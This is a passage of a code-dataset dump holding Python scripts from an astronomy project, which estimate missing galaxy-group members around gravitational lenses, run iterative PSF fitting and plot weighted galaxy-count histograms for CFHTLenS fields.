1)\n else: x = np.random.poisson(1.0 * all * len(observed120_membersID)/specs120, 1)\n break\n return x\n\npdz = np.array([])\ntheorysamples = 50000\nfor i in range(theorysamples):\n if i % 100 == 0: print i,'/',theorysamples\n #print i\n expected = expected_members()\n if mode == \"mcmc\": pdz = np.append(pdz,int(round(expected[1] * 
expected[0])))\n if mode == \"poisson\": pdz = np.append(pdz,expected[0])\npdznoprior = np.array([])\nfor i in range(theorysamples):\n if i % 100 == 0: print i,'/',theorysamples\n #print i\n expected = expected_members_noprior()\n if mode == \"mcmc\": pdznoprior = np.append(pdznoprior,int(round(expected[1] * expected[0])))\n if mode == \"poisson\": pdznoprior = np.append(pdznoprior,expected[0])\n\nif selectpdz == True:\n pdzselect = np.array([])\n for i in range(samples):\n expected = expected_members()\n if mode == \"mcmc\":\n if (lens == 'PG1115') or (zgroup == 0.6588): missing120_membersID = np.random.choice(a=pool, size=int(round(expected[1] * expected[0] - len(observed120_membersID) - 1)), replace=False)\n else: missing120_membersID = np.random.choice(a=pool, size=int(round(expected[1] * expected[0] - len(observed120_membersID))), replace=False)\n if mode == \"poisson\":\n if (lens == 'PG1115') or (zgroup == 0.6588): missing120_membersID = np.random.choice(a=pool, size=int(round(expected[0] - len(observed120_membersID) - 1)), replace=False)\n else: missing120_membersID = np.random.choice(a=pool, size=int(round(expected[0] - len(observed120_membersID))), replace=False)\n missing120_membersra = np.array([])\n missing120_membersdec = np.array([])\n #pdzselect = np.append(pdzselect,len(missing120_membersID)+len(observed120_membersID))\n if (lens == 'PG1115') or (zgroup == 0.6588): pdzselect = np.append(pdzselect,len(missing120_membersID)+len(observed120_membersID) + 1)\n else: pdzselect = np.append(pdzselect,len(missing120_membersID)+len(observed120_membersID))\n for j in range(len(missing120_membersID)):\n missing120_membersra = np.append(missing120_membersra,data[:,ra][data[:,id]==missing120_membersID[j]][0])\n missing120_membersdec = np.append(missing120_membersdec,data[:,dec][data[:,id]==missing120_membersID[j]][0])\n for k in range(len(observed120_membersID)):\n # removing also the known group members\n missing120_membersra = np.append(missing120_membersra,data[:,ra][data[:,id]==observed120_membersID[k]][0])\n missing120_membersdec = np.append(missing120_membersdec,data[:,dec][data[:,id]==observed120_membersID[k]][0])\n if lens == '0408': np.savetxt(\"/Users/cerusu/Dropbox/Davis_work/code/0408/removelensgrouphandpicked\"+str(i)+\".cat\",np.c_[missing120_membersra,missing120_membersdec],fmt='%.8f %.9f')\n #if zgroup == 0.6588: np.savetxt(\"/Users/cerusu/Dropbox/Davis_work/code/WFI2033/removelensgrouphandpicked\"+str(i)+\".cat\",np.c_[missing120_membersra,missing120_membersdec],fmt='%.8f %.9f')\n #if zgroup == 0.4956: np.savetxt(\"/Users/cerusu/Dropbox/Davis_work/code/WFI2033/removelensgroup049handpicked\"+str(i)+\".cat\",np.c_[missing120_membersra,missing120_membersdec],fmt='%.8f %.9f')\n #if zgroup == 0.3097: np.savetxt(\"/Users/cerusu/Dropbox/Davis_work/code/PG1115/removelensgroup\"+mode+\"handpicked\"+str(i)+\".cat\",np.c_[missing120_membersra,missing120_membersdec],fmt='%.8f %.9f')\n\nimport pylab as plt\nplt.clf()\nif (lens == 'PG1115') or (zgroup == 0.6588):\n plt.hist(pdz - len(observed120_membersID) - 1,bins=50,normed=True,label='w/ observed number prior')\n plt.hist(pdznoprior - len(observed120_membersID) - 1,bins=50,normed=True,label='w/o observed number prior',alpha = 0.5)\n if selectpdz == True: plt.hist(pdzselect - len(observed120_membersID) - 1,bins=50,normed=True,alpha = 0.5)\nelse:\n plt.hist(pdz - len(observed120_membersID),bins=50,normed=True,label='w/ observed number prior')\n plt.hist(pdznoprior - len(observed120_membersID),bins=50,normed=True,label='w/o observed 
number prior',alpha = 0.5)\n    if selectpdz == True: plt.hist(pdzselect - len(observed120_membersID),bins=50,normed=True,alpha = 0.5)\nplt.xlabel(r'Expected number of missing members', fontsize=20)\nplt.ylabel(r'normalized counts', fontsize=20)\nplt.legend(loc=\"upper left\")\nplt.show()\nif (lens == 'PG1115') or (zgroup == 0.6588): print np.percentile(pdz - len(observed120_membersID) - 1,[16,50,84]) # I ran the code several times until the two distributions matched fairly well\nelse: print np.percentile(pdz - len(observed120_membersID),[16,50,84])\n\n# the following lines are kept commented out. To produce a paper plot, I need to run them in iPython so I can run the mcmc and poisson modes in turn.\n# first run with poisson\n#pdz_poisson_lens = pdz\n#pdznoprior_poisson_lens = pdznoprior\n#len_lens = len(observed120_membersID)\n# next run with mcmc\n#pdz_mcmc_los = pdz\n#pdznoprior_mcmc_los = pdznoprior\n#len_los = len(observed120_membersID)\n#plt.clf()\n#bin = 50\n#if (lens == 'PG1115'):\n#    plt.hist(pdz_mcmc - len(observed120_membersID) - 1,bins=bin,normed=True,label='Volume-based; w/ observed number prior',color='r')\n#    plt.hist(pdznoprior_mcmc - len(observed120_membersID) - 1,bins=bin,normed=True,label='Volume-based; w/o observed number prior',alpha = 0.5,color='r')\n#    plt.hist(pdznoprior_poisson - len(observed120_membersID) - 1,bins=bin,normed=True,label='Poisson-based; w/o observed number prior',alpha = 0.5,color='k')\n#else:\n#    plt.hist(pdz_mcmc - len(observed120_membersID),bins=bin,normed=True,label='Volume-based; w/ observed number prior',color='r')\n#    plt.hist(pdznoprior_mcmc - len(observed120_membersID),bins=bin,normed=True,label='Volume-based; w/o observed number prior',alpha = 0.5,color='r')\n#    plt.hist(pdznoprior_poisson - len(observed120_membersID),bins=bin,normed=True,label='Poisson-based; w/o observed number prior',alpha = 0.5,color='k')\n#plt.xlabel(r'Expected number of missing group members', fontsize=16)\n#plt.ylabel(r'normalized counts', fontsize=16)\n#plt.legend(loc=\"upper left\")\n#plt.title(r'PG1115+080', fontsize=20)\n#if (lens == 'PG1115'): print np.percentile(pdz - len(observed120_membersID) - 1,[16,50,84]) # I ran the code several times until the two distributions matched fairly well\n#else: print np.percentile(pdz - len(observed120_membersID),[16,50,84])\n#plt.savefig('/Users/cerusu/Dropbox/Davis_work/code/PG1115/estimatinggroupmembersPG1115.png', dpi=250, bbox_inches='tight')\n\n#plt.clf()\n#bin = 100\n#plt.hist(pdz_mcmc_lens - len_lens - 1,bins=bin,normed=True,label='z=0.66 Volume-based; w/ observed number prior',color='k',linestyle='--',histtype='step')\n#plt.hist(pdznoprior_mcmc_lens - len_lens - 1,bins=bin,normed=True,label='z=0.66 Volume-based; w/o observed number prior',color='k',linestyle=':',histtype='step')\n#plt.hist(pdznoprior_poisson_lens - len_lens - 1,bins=bin,normed=True,label='z=0.66 Poisson-based',color='k',linestyle='-',histtype='step')\n#plt.hist(pdz_mcmc_los - len_los,bins=bin,normed=True,label='z=0.49 Volume-based; w/ observed number prior',color='r',linestyle='--',histtype='step')\n#plt.hist(pdznoprior_mcmc_los - len_los,bins=bin,normed=True,label='z=0.49 Volume-based; w/o observed number prior',color='r',linestyle=':',histtype='step')\n#plt.hist(pdznoprior_poisson_los - len_los,bins=bin,normed=True,label='z=0.49 Poisson-based',color='r',linestyle='-',histtype='step')\n#plt.xlabel(r'Expected number of missing group members', fontsize=16)\n#plt.ylabel(r'normalized counts', fontsize=16)\n#plt.legend(loc=\"upper 
left\")\n#plt.xlim([-20,30])\n#plt.savefig('/Users/cerusu/Dropbox/Davis_work/code/WFI2033/estimatingmissinggroupmembersWFI2033.png', dpi=250, bbox_inches='tight')\n" }, { "alpha_fraction": 0.647606372833252, "alphanum_fraction": 0.7207446694374084, "avg_line_length": 34.761905670166016, "blob_id": "1d2c0b0a4e399af7fe21d029926b14aa9ca61711", "content_id": "ad85b6f1ed6ae5c9ddc31a93c53512497ba9aba2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 752, "license_type": "no_license", "max_line_length": 94, "num_lines": 21, "path": "/python/plot_utilities/plot_imageoverlay.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# Plots on top of a png image\n\nimport matplotlib.image as mpimg\nfrom astropy.io import fits\nfrom matplotlib.colors import LogNorm\nimport matplotlib.pyplot as plt\nimport numpy as np\nplt.clf()\n#plt.axes().set_aspect('equal')\nimg=mpimg.imread('J1206gri.png')\nplt.imshow(img)\n#circle1 = plt.Circle((1/2.0,1/2.0),1/2.0,color='k',fill=False)\ncircle1 = plt.Circle((738,736.6),736,color='k',fill=False)\ngal=np.loadtxt(\"J1206_i23_120gal.cat\",usecols=[0,1],unpack=True)\nplt.scatter(1.005*gal[0],0.99*(1488-gal[1]),marker='s',facecolors='none', edgecolors='r',s=30)\nfig = plt.gcf()\nfig.gca().add_artist(circle1)\nfig = plt.gca()\nfig.axes.get_xaxis().set_visible(False)\nfig.axes.get_yaxis().set_visible(False)\nplt.savefig('test.png', dpi=300, bbox_inches='tight')\n\n" }, { "alpha_fraction": 0.5811688303947449, "alphanum_fraction": 0.6228355169296265, "avg_line_length": 36.71428680419922, "blob_id": "3bf9724151283e263538e3a5c56ebb41e19e36e7", "content_id": "8892ee98126245cfe7b898330e050f1ad6147090", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1848, "license_type": "no_license", "max_line_length": 214, "num_lines": 49, "path": "/python/modeling_utilities/iterateChihFan_2psf.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# I first edit gconfig to contain the correct input names. 
After that I modify g_nolens_out_file.input to use gpsfcorrect.fits as psf, disallow analytical PSF parameters (except for sky) and run the code as follows:\n# run as python iterateChihFan.py i_lens_out_file.input config psfcorrect.fits\n\nimport sys\nimport os\nimport numpy as np\nfrom astropy.io import fits\n\niterations = 3\npixscale = 0.256\n\nfor i in range(iterations):\n    with open(sys.argv[1], 'r') as fileinput:\n        hostlens = fileinput.readlines()\n\n    x1 = float(hostlens[54-1].split()[1]) # faint\n    y1 = float(hostlens[55-1].split()[1])\n    f1 = float(hostlens[61-1].split()[1])\n    x2 = float(hostlens[43-1].split()[1]) # bright\n    y2 = float(hostlens[44-1].split()[1])\n    f2 = float(hostlens[50-1].split()[1])\n\n    image = fits.open(str(sys.argv[1])[:-10]+\"psf.fits\")\n    data = image[0].data * f2\n    imagex = image\n    imagex[0].data = data\n    imagex.writeto(str(sys.argv[3]),clobber=True)\n\n    with open(sys.argv[2], 'r') as fileconfig:\n        config = fileconfig.readlines()\n\n    config[6] = \"x1_in_arcsec \" + \"%.6f\" % (x1 * pixscale) + \"\\n\"\n    config[7] = \"y1_in_arcsec \" + \"%.6f\" % (y1 * pixscale) + \"\\n\"\n    config[8] = \"x2_in_arcsec \" + \"%.6f\" % (x2 * pixscale) + \"\\n\"\n    config[9] = \"y2_in_arcsec \" + \"%.6f\" % (y2 * pixscale) + \"\\n\"\n    config[10] = \"intensityof1(weak) \" + \"%.6e\" % f1 + \"\\n\"\n    config[11] = \"intensityof2(strong) \" + \"%.6e\" % f2 + \"\\n\"\n\n    with open(sys.argv[2], 'w') as fileconfig:\n        fileconfig.writelines(config)\n\n    fileinput.close()\n    fileconfig.close()\n\n    os.system(\"python PSF_correction_2psf.py %s %s\" %(str(sys.argv[2]),str(sys.argv[3])))\n    os.system(\"hostlens %s\" % str(sys.argv[1]))\n\nfor i in range(1):\n    os.system(\"hostlens %s\" % str(sys.argv[1])) # because hostlens needs a few executions in order to fully converge\n" }, { "alpha_fraction": 0.5441909432411194, "alphanum_fraction": 0.649665892124176, "avg_line_length": 93.82527923583984, "blob_id": "74e6ed152df7d19cb005da2f50d768b152fec2d2", "content_id": "b005da2f50d768b152fec2d277b2936190549bf9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 111799, "license_type": "no_license", "max_line_length": 490, "num_lines": 1179, "path": "/python/weightinghistogramsuniversal.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# fields CFHTLenS W1-4\n# subfields: 171 1deg^2 throughout W1-4\n# cells: 4x4arcmin covering each subfield, in a grid\n# usage: use one of the following arguments: lens name, followed by orig or samp, followed by number of bins, followed by radius (45,60,90 or 120) and by maglimit\n\nimport numpy as np\nimport sys\nimport os\nfrom os import system\n#import scipy\n#from scipy import special\n#from astropy.io import fits\n#from astropy.wcs import WCS\n#from astropy import units as u\n#from astropy.coordinates import SkyCoord\n#from astropy.io import ascii\n#from astropy.table import Table, Column\nimport time\nimport matplotlib.pyplot as plt\n#from numpy.random import normal\nfrom scipy.stats.kde import gaussian_kde\nfrom numpy import linspace\n\nprint(\"Arguments: \\n Lens field: %s \\n Original values or samples drawn from P(z) and P(Mstar): %s \\n Number of bins: %s \\n Radius of each cell: %s \\n Limiting i-band magnitude: %s\" % (str(sys.argv[1]), str(sys.argv[2]), str(sys.argv[3]), str(sys.argv[4]), str(sys.argv[5])))\n\nif (str(sys.argv[2]) == \"samp\") or (str(sys.argv[2]) == \"tab\"):\n    print \"This process is both processor and memory intensive and will take a couple of hours for a sampling 
of 1000...\"\n start_time = time.time()\n\nwith open('fieldsforhist50try_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5]))) as f:\n listfields = f.readlines()\n\nwith open('fieldshistW1_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), 'w') as outfile:\n for i in range(len(listfields)):\n if \"W1\" in [x[0:len(listfields[0])-1] for x in listfields][i]:\n with open([x[0:len(listfields[0])-1] for x in listfields][i]) as infile:\n outfile.write(infile.read())\n\nwith open('fieldshistW2_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), 'w') as outfile:\n for i in range(len(listfields)):\n if \"W2\" in [x[0:len(listfields[0])-1] for x in listfields][i]:\n with open([x[0:len(listfields[0])-1] for x in listfields][i]) as infile:\n outfile.write(infile.read())\n\nwith open('fieldshistW3_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), 'w') as outfile:\n for i in range(len(listfields)):\n if \"W3\" in [x[0:len(listfields[0])-1] for x in listfields][i]:\n with open([x[0:len(listfields[0])-1] for x in listfields][i]) as infile:\n outfile.write(infile.read())\n\nwith open('fieldshistW4_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), 'w') as outfile:\n for i in range(len(listfields)):\n if \"W4\" in [x[0:len(listfields[0])-1] for x in listfields][i]:\n with open([x[0:len(listfields[0])-1] for x in listfields][i]) as infile:\n outfile.write(infile.read())\n\nwith open('fieldsforhist75try_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5]))) as f:\n listfields = f.readlines()\n\nwith open('fieldshistW1_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), 'w') as outfile:\n for i in range(len(listfields)):\n if \"W1\" in [x[0:len(listfields[0])-1] for x in listfields][i]:\n with open([x[0:len(listfields[0])-1] for x in listfields][i]) as infile:\n outfile.write(infile.read())\n\nwith open('fieldshistW2_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), 'w') as outfile:\n for i in range(len(listfields)):\n if \"W2\" in [x[0:len(listfields[0])-1] for x in listfields][i]:\n with open([x[0:len(listfields[0])-1] for x in listfields][i]) as infile:\n outfile.write(infile.read())\n\nwith open('fieldshistW3_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), 'w') as outfile:\n for i in range(len(listfields)):\n if \"W3\" in [x[0:len(listfields[0])-1] for x in listfields][i]:\n with open([x[0:len(listfields[0])-1] for x in listfields][i]) as infile:\n outfile.write(infile.read())\n\nwith open('fieldshistW4_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), 'w') as outfile:\n for i in range(len(listfields)):\n if \"W4\" in [x[0:len(listfields[0])-1] for x in listfields][i]:\n with open([x[0:len(listfields[0])-1] for x in listfields][i]) as infile:\n outfile.write(infile.read())\n\ncols=1\nq_W1_50read = np.loadtxt('fieldshistW1_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W1_50 = q_W1_50read[q_W1_50read < 10]\nq_W2_50read = np.loadtxt('fieldshistW2_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], 
unpack=True)\nq_W2_50 = q_W2_50read[q_W2_50read < 10]\nq_W3_50read = np.loadtxt('fieldshistW3_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W3_50 = q_W3_50read[q_W3_50read < 10]\nq_W4_50read = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_50 = q_W4_50read[q_W4_50read < 10]\nq_W1_75read = np.loadtxt('fieldshistW1_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W1_75 = q_W1_75read[q_W1_75read < 10]\nq_W2_75read = np.loadtxt('fieldshistW2_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W2_75 = q_W2_75read[q_W2_75read < 10]\nq_W3_75read = np.loadtxt('fieldshistW3_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W3_75 = q_W3_75read[q_W3_75read < 10]\nq_W4_75read = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_75 = q_W4_75read[q_W4_75read < 10]\n\nplt.suptitle(r'HE0435 weight histogram test W1-W4', fontsize=10, y=0.998)\n\ngauss_q_W1_50 = gaussian_kde(q_W1_50)\ngauss_q_W2_50 = gaussian_kde(q_W2_50)\ngauss_q_W3_50 = gaussian_kde(q_W3_50)\ngauss_q_W4_50 = gaussian_kde(q_W4_50)\ngauss_q_W1_75 = gaussian_kde(q_W1_75)\ngauss_q_W2_75 = gaussian_kde(q_W2_75)\ngauss_q_W3_75 = gaussian_kde(q_W3_75)\ngauss_q_W4_75 = gaussian_kde(q_W4_75)\n\nx = linspace(0,2,500)\n\nplt.subplot(451)\nrangemax=4\nn_q_W1_50, bins_q_W1_50, patches = plt.hist(q_W1_50, histtype='step', color='b', label='W1_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nn_q_W2_50, bins_q_W2_50, patches = plt.hist(q_W2_50, histtype='step', color='g', label='W2_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nn_q_W3_50, bins_q_W3_50, patches = plt.hist(q_W3_50, histtype='step', color='r', label='W3_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nn_q_W4_50, bins_q_W4_50, patches = plt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nn_q_W1_75, bins_q_W1_75, patches = plt.hist(q_W1_75, histtype='step', color='b', label='W1_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nn_q_W2_75, bins_q_W2_75, patches = plt.hist(q_W2_75, histtype='step', color='g', label='W2_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nn_q_W3_75, bins_q_W3_75, patches = plt.hist(q_W3_75, histtype='step', color='r', label='W3_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nn_q_W4_75, bins_q_W4_75, patches = plt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nplt.hist(q_W1_50, histtype='step', color='b', label='W1_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nplt.hist(q_W2_50, histtype='step', color='g', label='W2_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nplt.hist(q_W3_50, histtype='step', color='r', label='W3_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, 
rangemax])\nplt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nplt.hist(q_W1_75, histtype='step', color='b', label='W1_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nplt.hist(q_W2_75, histtype='step', color='g', label='W2_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nplt.hist(q_W3_75, histtype='step', color='r', label='W3_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nplt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n#plt.plot(x,gauss_q_W1_50(x),'b', linewidth=0.5)\nax=plt.subplot(451)\n#s = \"50: %.3f,%.3f,%.3f\" % (x[np.argmax(gauss_q_W1_50(x))],np.average(q_W1_50),np.median(q_W1_50))\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W1_50[np.argmax(n_q_W1_50)],np.average(q_W1_50),np.median(q_W1_50)) # only the peak depends on the binning\nax.text(0.15, 0.8, s, fontsize=5, color='b',transform=ax.transAxes)\n#s = \"50: %.3f,%.3f,%.3f\" % (x[np.argmax(gauss_q_W2_50(x))],np.average(q_W2_50),np.median(q_W2_50))\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W2_50[np.argmax(n_q_W2_50)],np.average(q_W2_50),np.median(q_W2_50))\nax.text(0.15, 0.6, s, fontsize=5, color='g',transform=ax.transAxes)\n#s = \"50: %.3f,%.3f,%.3f\" % (x[np.argmax(gauss_q_W3_50(x))],np.average(q_W3_50),np.median(q_W3_50))\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W3_50[np.argmax(n_q_W3_50)],np.average(q_W3_50),np.median(q_W3_50))\nax.text(0.15, 0.4, s, fontsize=5, color='r',transform=ax.transAxes)\n#s = \"50: %.3f,%.3f,%.3f\" % (x[np.argmax(gauss_q_W4_50(x))],np.average(q_W4_50),np.median(q_W4_50))\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W4_50[np.argmax(n_q_W4_50)],np.average(q_W4_50),np.median(q_W4_50))\nax.text(0.15, 0.2, s, fontsize=5, color='k',transform=ax.transAxes)\n#s = \"75: %.3f,%.3f,%.3f\" % (x[np.argmax(gauss_q_W1_75(x))],np.average(q_W1_75),np.median(q_W1_75))\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W1_75[np.argmax(n_q_W1_75)],np.average(q_W1_75),np.median(q_W1_75))\nax.text(0.15, 0.7, s, fontsize=5, color='b',transform=ax.transAxes)\n#s = \"75: %.3f,%.3f,%.3f\" % (x[np.argmax(gauss_q_W2_75(x))],np.average(q_W2_75),np.median(q_W2_75))\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W2_75[np.argmax(n_q_W2_75)],np.average(q_W2_75),np.median(q_W2_75))\nax.text(0.15, 0.5, s, fontsize=5, color='g',transform=ax.transAxes)\n#s = \"75: %.3f,%.3f,%.3f\" % (x[np.argmax(gauss_q_W3_75(x))],np.average(q_W3_75),np.median(q_W3_75))\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W3_75[np.argmax(n_q_W3_75)],np.average(q_W3_75),np.median(q_W3_75))\nax.text(0.15, 0.3, s, fontsize=5, color='r',transform=ax.transAxes)\n#s = \"75: %.3f,%.3f,%.3f\" % (x[np.argmax(gauss_q_W4_75(x))],np.average(q_W4_75),np.median(q_W4_75))\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W4_75[np.argmax(n_q_W4_75)],np.average(q_W4_75),np.median(q_W4_75))\nax.text(0.15, 0.1, s, fontsize=5, color='k',transform=ax.transAxes)\nplt.xlabel(r'$\\zeta_{gal}$', fontsize=15)\nplt.ylabel(\"Normalized cnts\", fontsize=7)\nplt.tick_params(axis='x', labelsize=6)\nplt.tick_params(axis='y', labelsize=6)\nplt.setp(plt.xticks()[1], rotation=90)\n\nsubplot = 1\nprint \"finished subplot %d/16; fraction of points inside the q < 10 cut: \\n W1_50 %.3f W1_75 %.3f \\n W2_50 %.3f W2_75 %.3f \\n W3_50 %.3f W3_75 %.3f \\n W4_50 %.3f W4_75 %.3f \" % (subplot, float(q_W1_50.size)/q_W1_50read.size, 
float(q_W1_75.size)/q_W1_75read.size, float(q_W2_50.size)/q_W2_50read.size, float(q_W2_75.size)/q_W2_75read.size, float(q_W3_50.size)/q_W3_50read.size, float(q_W3_75.size)/q_W3_75read.size, float(q_W4_50.size)/q_W4_50read.size, float(q_W4_75.size)/q_W4_75read.size)\n\ncols=3\nq_W1_50read = np.loadtxt('fieldshistW1_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W1_50 = q_W1_50read[q_W1_50read < 10]\nq_W2_50read = np.loadtxt('fieldshistW2_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W2_50 = q_W2_50read[q_W2_50read < 10]\nq_W3_50read = np.loadtxt('fieldshistW3_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W3_50 = q_W3_50read[q_W3_50read < 10]\nq_W4_50read = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_50 = q_W4_50read[q_W4_50read < 10]\nq_W1_75read = np.loadtxt('fieldshistW1_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W1_75 = q_W1_75read[q_W1_75read < 10]\nq_W2_75read = np.loadtxt('fieldshistW2_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W2_75 = q_W2_75read[q_W2_75read < 10]\nq_W3_75read = np.loadtxt('fieldshistW3_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W3_75 = q_W3_75read[q_W3_75read < 10]\nq_W4_75read = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_75 = q_W4_75read[q_W4_75read < 10]\n\nx = linspace(0,2,500)\n\ngauss_q_W1_50 = gaussian_kde(q_W1_50)\ngauss_q_W2_50 = gaussian_kde(q_W2_50)\ngauss_q_W3_50 = gaussian_kde(q_W3_50)\ngauss_q_W4_50 = gaussian_kde(q_W4_50)\ngauss_q_W1_75 = gaussian_kde(q_W1_75)\ngauss_q_W2_75 = gaussian_kde(q_W2_75)\ngauss_q_W3_75 = gaussian_kde(q_W3_75)\ngauss_q_W4_75 = gaussian_kde(q_W4_75)\n\nplt.subplot(452)\nrangemax=4\nn_q_W1_50, bins_q_W1_50, patches = plt.hist(q_W1_50, histtype='step', color='b', label='W1_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nn_q_W2_50, bins_q_W2_50, patches = plt.hist(q_W2_50, histtype='step', color='g', label='W2_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nn_q_W3_50, bins_q_W3_50, patches = plt.hist(q_W3_50, histtype='step', color='r', label='W3_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nn_q_W4_50, bins_q_W4_50, patches = plt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nn_q_W1_75, bins_q_W1_75, patches = plt.hist(q_W1_75, histtype='step', color='b', label='W1_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nn_q_W2_75, bins_q_W2_75, patches = plt.hist(q_W2_75, histtype='step', color='g', label='W2_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nn_q_W3_75, bins_q_W3_75, patches = plt.hist(q_W3_75, histtype='step', color='r', label='W3_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nn_q_W4_75, 
